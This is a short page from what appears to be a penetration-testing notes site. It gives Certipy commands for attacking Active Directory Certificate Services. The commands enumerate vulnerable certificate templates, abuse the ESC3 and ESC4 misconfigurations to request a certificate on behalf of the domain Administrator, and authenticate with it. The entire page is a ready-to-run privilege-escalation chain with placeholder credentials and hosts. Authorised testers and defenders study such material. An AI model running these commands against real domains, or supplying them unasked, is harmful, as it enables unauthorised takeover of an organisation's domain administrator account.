Certificates

  • Enumerate certificates

certipy find -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -stdout -vulnerable -enable

  • Get certificates

certipy req -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -target DC-01.domain.dc -ca 'CA' -template Template -debug

  • Get admin certificate with ESC3 vulnerability

certipy req -dc-ip DC_IP -u 'USER' -p 'PASSWORD' -target DC-01.domain.dc -ca 'CA' -template 'User' -on-behalf-of 'domain\Administrator' -pfx user.pfx -debug

  • Get admin certificate with ESC4 vulnerability

certipy template -u "user@domain" -p "password" -dc-ip "DC_IP" -template TEMPLATE_NAME -save-old
certipy req -u "user@domain" -p "password" -dc-ip "DC_IP" -target "DC01.domain.hc" -ca 'CA_NAME' -template 'TEMPLATE_NAME' -upn 'domain admin'
certipy req -dc-ip DC_IP -u 'user' -p 'password' -target DC01.domain.hc -ca 'CA_NAME' -template 'User' -on-behalf-of 'domain\Administrator' -pfx 'domain admin.pfx' -debug

  • Authenticate

certipy auth -pfx administrator.pfx

PreviousWindowsNextHackingclub

Last updated